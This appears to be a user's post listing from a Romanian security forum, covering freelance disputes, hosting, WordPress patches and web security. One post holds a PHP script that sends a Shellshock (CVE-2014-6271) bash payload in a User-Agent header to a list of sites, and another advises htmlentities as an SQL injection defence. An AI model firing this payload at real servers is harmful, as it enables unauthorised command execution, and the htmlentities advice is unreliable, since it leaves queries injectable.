-
Posts
2653 -
Joined
-
Last visited
-
Days Won
73
Posts posted by Dragos
-
-
Salutari,
Caut un developer de flash pentru un amic pentru crearea unei aplicatii de videochat. Doritorii va rog lasati un raspuns daca ati mai facut asta pana acum sau alte proiecte asemanatoare in flash.
-
Mergi cu numaratul pixelilor din stanga sus. Facusem nebunia asta pentru un joc acum un an, doi si iti dadea si coordonatele. Ia scriptul si extrage-ti partea care te intereseaza.
-
S-a prajit de tot Valium.
cc @aelius
-
Functia mysql_real_escape_string nu este suficienta pentru a bloca SQLi.
Spre exemplu avem scriptul acesta
$id = mysql_real_escape_string($_GET['id']);
$sql = mysql_query("select * from tabel where ID=$id");Daca introduc in GET "1 or 1=2" o sa se execute scriptul.
Nu folosi nici scriptul lui @Geoutsu pentru ca se poate trece de el printr-un string codat in hexa.
Cel mai usor foloseste htmlentities cu flag-ul ENT_QUOTES.
$id = htmlentities($_GET['id'],ENT_QUOTES);
$sql = mysql_query("select * from tabel where ID=$id"); -
L-am primit dupa cateva zile.
-
E ok ideea, dar macar daca se face, cel care doneaza sa aleaga cumva calumea cui sa-i dea in ideea in care respectivul chiar are nevoie de asta.
-
Ziceam si la mine pe blog, daca sunt programele de genul acum in varianta preview, ai putea sa incerci sa schimbi locul unde se trimit informatiile si ai toate datele despre om.
-
Ai mancat vreo 2 ))
la $context = ))); la sfarsit:))
Sunt intentionat puse.
-
Asta e de script-kiddie. Eu in locul developerului as fi pus si un script de minat bitcoini in aplicatie ca daca tot descarca copiii, macar sa fac si eu un ban cinstit.
Mai rapid se poate face asa din consola.
<?php
$situri = array("http://site.ro/","http://site2.ro");
foreach($situri as $sit)
{
if(scaneaza($sit))
echo $sit . "\n";
}
function scaneaza($url)
{
$cmd = "ls";
$context = stream_context_create(
array(
'http' => array(
'method' => 'GET',
'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
)
)
if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)
return 1;
else
return 0;
}
?> -
Din ce am inteles, oamenii de la GlobeHosting nu mai vor sa plateasca taxa de retragere a banilor din Paypal, asa ca te pun pe tine sa platesti si taxa aia. E taranism chestia asta.
-
In afara sa-l folosesti pe post de carpa sa mai stergi praful sau geamul de la masina, n-ai ce face cu el.
-
Sare pe filtrele de verificare ca nu ai content si returnezi 500 internal server error.
-
Pe bune? Flood?
Edit: E up
-
Un mic tool pe care l-am scris in seara asta pentru a verifica daca un site e vulnerabil la CVE-2014-6271/CVE-2014-7169.
Am I vulnerable to Shellshock / Bash bug? - Dragos Gaftoneanu
- 1
-
http://edition.cnn.com/2011/09/30/tech/social-media/facebook-charge-fee-ostrow/
-
-
Creeaza fisierul 4char.txt si da-i permisiuni de citire/scriere pe el.
-
Astea sunt tampenii vechi de pe 4chan. De acolo a aparut si bula magica pentru apa.
-
Dupa ani si ani, plugin oficial de Wordpress
https://wordpress.org/plugins/patch-for-revolution-slider/
-
Ei sunt mai stricti cu seedul pe torrente.Poti sa si descarci de pe unele site-uri chestii pirat,important e sa nu le dai mai departe.
(I may be wrong)
Daca ai descarcat ceva de pe torrente, in ziua urmatoare vine politia la tine cu mandat.
-
A fost doar un contract de confidentialitate pentru a nu furniza datele de la hostul lor de exemplu si ala semnat in word.(mi-am scris numele)
Din cate stiu, astfel de contracte se fac cu semnatura olografa conform legii din Romania. Intreaba pe cineva care e jurist.
-
-
Salut,
Am o problema mai delicata.
Am lucrat la doua proiecte pentru cineva.Primul de 300 ron,al doilea de 1200 ron.
Dupa ce l-am terminat pe primul,am primit cei 300 ron.La al doilea am primit un avans de 300 ron pentru a lua proiectul lor.Am terminat proiectul si mi-au fost trimisi si ceilalti bani,900 ron.La 4 zile dupa ce am primit banii primesc un mail in care sunt intrebat de ce nu vreau sa mai comunic cu ei si nu vreau sa imi termin treaba si ca l-am furat,in 48 ore sa restitui suma de 1200 ron,contravaloarea celui de-al doilea proiect.In caz contrar,suma se va dubla,apoi tripla.
Poate face vreo faza de genul si sa fiu nevoit sa ii returnez banii?
Repet,am primit 300 inainte si 900 la terminarea proiectului.
Imi poate face vreo faza de genul??
Va rog,evitati off-topic-ul.Multumesc.
Daca ai facut pe contract, citeste un pic clauzele contractului. Daca nu scrie vreo magarie, inseamna ca esti protejat si daca intri in instanta sau ceva, poti arata proiectul facut cap coada. Pastreaza ce ai facut in calculator pana se termina hora.
Daca nu ai facut o parte din proiect, e nasol si au libertatea sa te acuze.
Daca nu ai facut pe contract, n-ai treaba.
Parerea mea e sa le mai trimiti o data proiectul.
-
Daca ar putea cineva sa faca un tutorial as fi tare recunoscator
La doua posturi ale tale mai ai si pretentii, mai ales ca e un subiect delicat.
pe cine alegi? [sondaj rst]
in Discutii non-IT
Posted
Eu vin cu zarurile.